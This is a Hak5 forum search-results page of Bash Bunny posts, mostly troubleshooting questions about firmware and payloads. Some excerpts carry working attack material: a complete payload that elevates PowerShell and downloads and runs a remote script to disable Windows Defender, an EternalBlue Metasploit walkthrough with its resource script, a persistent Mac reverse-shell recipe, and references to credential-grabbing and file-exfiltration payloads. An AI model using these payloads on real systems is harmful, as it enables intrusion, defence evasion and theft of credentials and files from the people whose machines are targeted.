Jump to content

Search the Community

Showing results for tags 'bashbunny'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Hak5 Cloud C²
    • Plunder Bug
    • Bash Bunny
    • Signal Owl
    • USB Rubber Ducky
    • Packet Squirrel
    • LAN Turtle
    • Screen Crab
    • Shark Jack
    • Key Croc
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 97 results

  1. Hi everyone, im a totally new on this. but i recently got my Bash Bunny and got the payloads from github. when i copy paste the payloads to switch 1 and plug it in to my laptop, but then it creates a file on loot "PasswordGrabber" but there isnt anything on the folder.
  2. Hello, Just asking you guys, is BB worth it in 2020? I mean is all of it detected by AV and does it run? Also how long the Bunny works, does it turn into DedBunny easily? Or does it have long life?
  3. Hi all, I need some help because I do not get quickcreds on my bashbunny to run. I'm am using Windows 10 for the bashbunny setup. ###Bashbunny in arm mode I copied the 1.6 firmware from https://downloads.hak5.org/bunny to the root of my bash bunny. Replugged the bashbunny and waited for the red blinking light to stop I checked the version.txt in root which confirmed 1.6_305 I downloaded the responder and the imppacket from here https://forums.hak5.org/topic/40971-info-tools/ and placed the two files in the tools directory responder-bunny.deb & impacket-bunny.deb Then I unplugged and plugged the bashbunny back in an checked that the tools folder was empty. Then I connected to the bashbunny and checked that the folder responder and impacket where copied to the device. Then I ran root@bunny:/tools/impacket# python setup.py install I then copied the quick creds payload to "D:\payloads\switch1\payload.txt" and safely ejected the bashbunny. ###Bashbunny in switch position 1 I plugged the bashbunny in my Windows 10 machine and the light is just solid red. I waited for 5 hours and the light was still unchanged. Any ideas what I am doing wrong? Is quickreds still working on firmware 1.6. Do you have any links to current tutorials or walkthroughs? Any help is much appreciated.
  4. Hi all, I need some help because I do not get quickcreds on my bashbunny to run. I'm am using Windows 10 for the bashbunny setup. ###Bashbunny in arm mode I copied the 1.6 firmware from https://downloads.hak5.org/bunny to the root of my bash bunny. Replugged the bashbunny and waited for the red blinking light to stop I checked the version.txt in root which confirmed 1.6_305 I downloaded the responder and the imppacket from here https://forums.hak5.org/topic/40971-info-tools/ and placed the two files in the tools directory responder-bunny.deb & impacket-bunny.deb Then I unplugged and plugged the bashbunny back in an checked that the tools folder was empty. Then I connected to the bashbunny and checked that the folder responder and impacket where copied to the device. Then I ran root@bunny:/tools/impacket# python setup.py install I then copied the quick creds payload to "D:\payloads\switch1\payload.txt" and safely ejected the bashbunny. ###Bashbunny in switch position 1 I plugged the bashbunny in my Windows 10 machine and the light is just solid red. I waited for 5 hours and the light was still unchanged. Any ideas what I am doing wrong? Is quickreds still working on firmware 1.6. Do you have any links to current tutorials or walkthroughs? Any help is much appreciated.
  5. Reverse Shell Mac for Bash Bunny Author: 0dyss3us (KeenanV) Version: 1.0 Description Opens a persistent reverse shell on victim's mac and connects it back to host attacker over TCP. Targets MacOS (OSX may work but has not been tested) Connection can be closed and reconnected at any time Deploys in roughly 30 sec (working on making it faster) Works well with NetCat as the listener Requirements Have a working Bash Bunny :) and a victim with MacOS STATUS LED STATUS Purple Setup Amber (Single Blink) Installing connect.sh script Amber (Double Blink) Creating cron job White (Fast Blink) Cleaning up Green Finished Installation and Execution Plug in Bash Bunny in arming mode Move files from MacPersistentReverseShell to either switch folder Edit the connect.sh file and replace the placeholder IP with attacker's IP and the port with whichever port you like to use (I use 1337 ?) Save the connect.sh file Unplug Bash Bunny and switch it to the position the payload is loaded on Plug the Bash Bunny into your victim's Mac and wait until the final light turns green (about 30 sec) Unplug the Bash Bunny and go to attacker's machine Listen on the port you chose in the connect.sh file on whichever program you'd like (I use NetCat) If using NetCat, run the command nc -nlvp 1337 (replace the port with the port in connect.sh) Wait for connection (Should take no longer than 1 minute as the cron job runs every minute) Once a bash shell prompt appears...YOU'RE DONE!! ? and you can disconnect and reconnect at any time as long as the user is logged in Download Click here to download.
  6. DisableD3f3nd3r This payload was created out of frustration of people asking how to disable Windows Defender via BashBunny, Rubber-Ducky. I have released payloads for both devices. This is just a basic Powershell "Download String" function to pull from a public Gist/GitHub RAW code (or any other RAW code format). The script will attempt to escalate to Administrator to perform "Disabling Defender". Source Code of the Powershell Script: https://gist.github.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc The Payload: #!/bin/bash # # Title: Disable D3f3nd3r (BashBunny) # Description: This Payload disables Windows Defender using Powershell, Works also for the Hak5 # Rubber Ducky or any HID device that supports Quacking. # Author: REDD of Private-Locker # Version: 1.0 # Category: Disable Security # Target: Windows # # Source: https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1 # LED SETUP ATTACKMODE HID LED ATTACK RUN WIN "powershell -NoP -NonI -W Hidden -Exec Bypass -c \"Start-Process cmd -A '/t:4f'-Verb runAs\"" Q LEFTARROW; Q ENTER; Q STRING "powershell -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1');\"" Q ENTER; sleep 1; Q STRING "exit"; Q ENTER; LED FINISH
  7. My latest BashBunny-Challenge.....MSF - MS17_010 - BashBunny Thanks to Astr0baby, iam just a sharer of his excellent thoughts Lets go..... Make sure to set some date for TLS/SSL to work ;) # date -s "20170925" Add this to /etc/apt/sources.list deb http://http.us.debian.org/debian/ jessie-updates main # apt-get update # apt-get -y install autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev # curl -sSL https://get.rvm.io | bash -s stable # source /etc/profile.d/rvm.sh # rvm requirements # rvm list known # rvm install 2.4.1 # vi /root/.bashrc Add at the end source /etc/profile/rvm.sh rvm use 2.4.1 --default # mkdir /root/METASPLOIT # cd /root/METASPLOIT/ # wget https://raw.githubusercontent.com/iam1980/metasploit-vps-installer/master/msf_vps_installer.sh # chmod +x msf_vps_installer.sh # ./msf_vps_installer.sh # git config --global user.name "USER" # git config --global user.email "user@example.com" # ./msfupdate Check the /etc/dhcp/dhcpd.conf range 172.16.64.10 - 172.16.64.12 and set to only one value range 172.16.64.64 - 172.16.64.64 Save this to ~/metasploit-framework as cmd.rc ----- use exploit/windows/smb/ms17_010_eternalblue set PAYLOAD windows/x64/exec set RHOST 172.16.64.64 set CMD cmd.exe exploit ----- The above is ideal when we want to get a NT SYSTEM/AUTHORITY shell on the target Windows 7 SP1 x64 (unlocked) If the target is locked we can use another payload such this one So RHOST would be again 172.16.64.64 and LHOST 172.16.64.1 … This can be easily scripted via Metasploit RC script so ;) The Metasploit RC scripts should be placed in the /root/metasploit-framework on the Bashbunny so we can call it from the PAYLOAD.TXT for the corresponding Attach Switch position . So ideally this would look like this (switch1 or switch 2) payload.txt #!/bin/bash LED SETUP ATTACKMODE RNDIS_ETHERNET #Set some current time ..... check your watch date -s "20170523 23:23" LED ATTACK /root/metasploit-framework/msfconsole -r /root/metasploit-framework/eternal-cmd.rc & LED FINISH The target Windows 7 should have an accessible SMB port 445 from the USB network that Bashbunny device create. Default Windows system has a firewall on so the attack wont work as the port is blocked. For the demonstration purpose we assume there is no firewall on .. After a while you should get a NT AUTHORITY\ SYSTEM cmd shell pop up on your Win 7 desktop :)
  8. Hey guys, I'd like to know how to emulate a mouse click in a certain position(x,y) on the screen? we must use VID/PID of a mouse I know that then how to adjust the payload to make a click ?
  9. Hi, Just wondering if anyone could give me some guidance I work in the security team at a company, I want to roll out a siem agent to developers laptops. I need to install this agent as quickly as possible to linux/mac boxes whilst they are locked or unlocked.(devs dont want to do it themselves are pretty reluctant on handing over their laptops) the agent is basically a bash script install... chmod +x & ./<filename> I think I could use my bashbunny to quickly walk over to the devs laptops, put the usb in... and job done.... So my question is if I run the install via a payload. will it install on the bashbunny OS or the laptop ive plugged it into? or will I have to copy it to the remote OS and use a series of key presses to run it. Any advice would be great. Thanks
  10. Hi, I've just received my Bash Bunny. First thing I've did is download and run bunnyupdater.exe I'm currently at version 1.6_305 with the \payloads\library full of payloads. When connecting the BB to a windows 10 machine, I can see things moving (like powershell window opening and "start > run" text) I can also see that the Payloads are creating the needed loot folders. But eventually these folders are empty. Among others I've tried using: WiPassDump, WifiPass, PasswordGrabber, Ascii-Prank and others. Nothing in the loot folder, and the "Ascii-Prank" didn't do anything. I tried it on 3 different computers (all windows 10). Any ideas on what could be the probelm? Is there are way to debug a PAYLOAD so I'd see which command fails? I'd appreciate any help.
  11. Shanegal

    shane

    hey guys, so I had some trouble with the screaming payload of doom payload so ive adapted the wallpaper changer payload to do basically the same thing but instead of transferring the wallpaper jpeg, it transfers the .wav file from the bash bunny. Everything kinda works apart from the transferred wav file keeps showing up as 0kb after the script has run? can anyone help me with this please? Here is the script ive have made and ive attached the full payload at the bottom LED SETUP ATTACKMODE HID RNDIS_ETHERNET GET HOST_IP GET SWITCH_POSITION udisk mount cd /root/udisk/payloads/$SWITCH_POSITION python -m SimpleHTTPServer 80 & LED ATTACK Q GUI r Q DELAY 500 Q STRING "cmd /C \"start /MIN powershell iwr $HOST_IP/S.WAV > %USERPROFILE%\s.wav&&@reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current\ /t REG_SZ /d %USERPROFILE%\s.wav /f" Q ENTER LED G SUCCESS s.wav screamer payload.txt
  12. Just got new bash bunny, having problem with switch position 1, poisition 2 works fine. #locked LED M FAST ATTACKMODE HID QUACK GUI This script is in both folders a payload, again it runs fine in position 2. When in position 1 LED goes solid magenta then switches to flashing blue, the bunny folder then opens. Any ideas as to why switch position 1 not working?
  13. tcunha

    Updating BB

    I got my bash bunny at the 1.3 firmware version and tried to update, but after that it stop working. Now I insert the bash bunny at the computer it turns the green light on for a second and turn of the led. I tried factory reset but it doesn't work.
  14. Hello, having received my new toy recently (bashbunny) : I tried to use some scripts like "wallpaper-changer-of-doom" except it didn't work at home. Here is the script: https://github.com/jcardonne/Bashbunny-payloads/blob/master/wallpaper-prank If some of you have any suggestions, I'm interested:) Affectionately, jcardonne
  15. I have been trying to figure out a problem with this payload and for some reason I just cant get it work i have impacket in my tools file and installed when I plug my Bunny in it goes throw the colors but it gets stuck in the blue color and i cant figure out why? Do anyone have the same problem?
  16. I just got my new bash bunny! I'm so excited to start using. One thing I noticed is I am unable to get the "windows key" to work. Specifically I am trying to open a command prompt but it is not working. I noticed when I use the combination of "Q GUI R" it actually presses "ALT + R". Bashbunny is running version 1.6 My laptop is a Lenovo T480 Running Windows 10 1809 ### PAYLOAD ATTACKMODE HID Q SET_LANGUAGE US Q DELAY 5000 LED M, R B Q GUI R Q DELAY 500 Q STRING cmd Q DELAY 500 Q ENTER LED G ### config.txt #!/bin/bash #This configuration file is used to set default variables DUCKY_LANG us
  17. I'm trying to install impacket and responder to my BB using the .deb files provided on another thread however, my bunny doesn't seem to recognise the updated tools folder. When I copy the files, eject and plug back in, it just boots as normal and doesn't copy anything to its /tools on its linux partition. I found a previous thread saying to delete the everything, change the version.txt file to an earlier version and run the updater but I don't wanna mess it up any more than it already is. I've tried restoring by inducing 3 failed boots to restore to factory but that hasn't seemed to work
  18. So I wanted to know if this was safe. I made a bunny script that when plugs into a Windows PC would upload specific files to a folder in my gdrive. I made this a project for myself because i was bored. I manipulated the "SmartFileExtract_Exfiltrator" code and used a gdrive software to make it work. How bad can this be and should it even exist at all?
  19. Hallo!! This is my payload, just a python smb server thats points to the switch folder. PROBLEM: it creates the share, but i cant access the files, because the /root/udisk is not mounted. If i boot the bunny in RNDIS, goto the console and do "udisk mount" i can access the files, but I cant mount udisk from inside a payload Any ideas? Is there anything I'm missing. Thx, and keep on developing!! :) #!/bin/bash LED SETUP GET SWITCH_POSITION SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION LOOTDIR=$SWITCHDIR/loot LED STAGE1 ATTACKMODE RNDIS_ETHERNET udisk mount python /tools/impacket/examples/smbserver.py e $SWITCHDIR & LED FINISH
  20. Hi, I got internet connection working, ssh'd in. Did apt-get update, then apt-get upgrade. Now Im unable to get any result of GET TARGET_IP I did the firmware reset, but am still having issues LED R SOLID ATTACKMODE ECM_ETHERNET LOOTDIR='/root/udisk/loot/IP' mkdir -p $LOOTDIR GET TARGET_IP echo "IP: $TARGET_IP" >> $LOOTDIR/IP.log LED G SOLID Running the above now gives me a file without the Target IP within. Any Ideas?
  21. This is a little later than i had liked but im finally ready for an 'Alpha' Release. From the team that brought you https://ducktoolkit.com i am happy to announce https://bunnytoolkit.com Concept is fairly simple. All the payloads that are in the github can be opened in the browser. You can then edit the files in the browser make changes as you like and once your happy with changes click the download button to get your payload folder. Copy the contents of this in to a switch position and away you go. For those who need a quick way of creating your own payloads we have the custom payload wizard. Answer some questions or pick a template and when you click finish you get a page that contains all the base templates which you can then add your own code to and save it as you do with the payload editor above. I will continue to add more custom features to the wizard and welcome any feedback or thoughts you may have.
  22. I am trying to edit the password grabber payload.txt so that the Finish LED will only turn on once laZagne.exe has finished and closed, because right now it turns on after 10 second while laZagne is still running, which if i remove the usb at that point, all of the excavated passwords are lost. i'd like it to work similar to powershell where if i Start-Process -filepath -wait it will wait to move on to the next line until the process has finished. issue is, WAIT on the bunny script means Wait for switch position change, and for some reason i cant seem to get grep to find the word password in the password.txt file Any assistance/suggestions are appreciated, i just want the finish led to actually mean finished.
  23. See some people getting stuck with updating bunnies and tools etc. so put together quicklist of what I did from a brand new bash bunny on my linux box. I'm sure there are some differences with OSX and windows but in general with adaptation or tweaks this should work for all as a general outline. 1. Read the wiki - seriously even if you dont remember it all, know where it is and use it for reference. 2. Switch position to 3 (closest to USB) and insert to pc. With mine I got a blue light. I also backed up the original payloads dir but its not required. 3. Clone the payloads github locally or download the zip and extract the contents. 4. Copy the payload folder you just cloned or extracted to the bash bunny storage and overwrite all. You now have latest payloads. At this point if you were to unplug the bunny, select switch 1 or 2 and then reinsert you would see a purple light rather than the blue one that came from factory (at least mine did). 5. Some payloads require dependencies such as quick creds. You install the dependencies using the tools_installer payload So its worth running this payload as your first payload. On the Bashbunny storage delete the payload in switch 1 or 2 and then CUT the contents of /payloads/library/tools_installer/ to the switch folder of choice. DONT copy it as there is a slight bug if you have 2x copy’s of this payload on the bashbunny storage when its run. Unplug the bunny and select the switch to match where you placed the payload and reinsert the bunny. If all goes well you should eventually see a white LED. if you see red LED you may need to check the forums. From this point your ready to try other payloads or start developing new ones. Talking of which I almost forgot DuckToolkit adds support for new languages. and uses the Ducktoolkit python library for encoding. I had some issues getting the bunny online with ICS on linux but was mostly down to me not reading things in the bb.sh ICS script but I will point them out in case others do the same. 1. A factory fresh bashbunny can only ICS when switch is in position 1 or 2 not in arming mode position 3. There is no Ethernet device on a factory fresh bunnny in arming mode. 2. When you download and run the bb.sh it should be first run without the bashbunny inserted and when the script gets to stage 3 you insert the bashbunny to complete the guided config. 3. Just because you configured the bb.sh does not mean your online, you still need to hit C to connect with the current configuration and start ICS. So from here you should have Bashbunny with up to date payloads, dependencies installed and are able to ICS to get it online if required. Hope this helps some people.
  24. The Bash Bunny is brilliant. It can already emulate USB devices such as keyboards, USB to Ethernet adapters, serial devices and mass storage devices. I don’t know how Hak5 have implemented the emulation features, but I imagine the Bash Bunny could potentially emulate other USB devices...? My question is what other USB devices would be really interesting to see implemented? How about USB fingerprint readers, for example? Could this allow a current PC to divulge information about a user’s fingerprint, or perhaps allow another fingerprint to be loaded onto the system? I’m really interested in how this could be implemented, and what devices could be emulated. Please let me know what you think! -MB60893.
  25. Hello Guys! First a big welcome to all! I got some HAK5 gear and I'm very fascinated from them. I've also read here since I've got the first gear to find help. And usually I've got a solution for me - but now I don't know how to go on... My BB won't write special chars. Neither with german language file nor with standard US language... All upper- and lowcase letters an numbers are working without problems. But special chars... Nothing... Frist I thought it's the german .json file becuase there where no Umlauts and some special chars seemed to have the wrong scancode. So I wrote my own .json file - Nothing.... Next day the new german .json with Umlauts was available - Nothing I have tried all commands I found anywhere to change language: - Nothing LANGUAGE='de' LANGUAGE=de LANGUAGE= de DUCKY_LANG='de' DUCKY_LANG=de DUCKY_LANG= de +DUCKY_LANG=de +DUCKY_LANG= de +DUCKY_LANG='de' QUACK SET_LANGUAGE de QUACK SET_LANGUAGE 'de' SET_LANGUAGE de SET_LANGUAGE 'de' So I've decided to try out with US Language. Changed keyboard language - Nothing.... I get no special chars... Anyone an idea I can try yet? Thanks and lovely Greets :-)
×
×
  • Create New...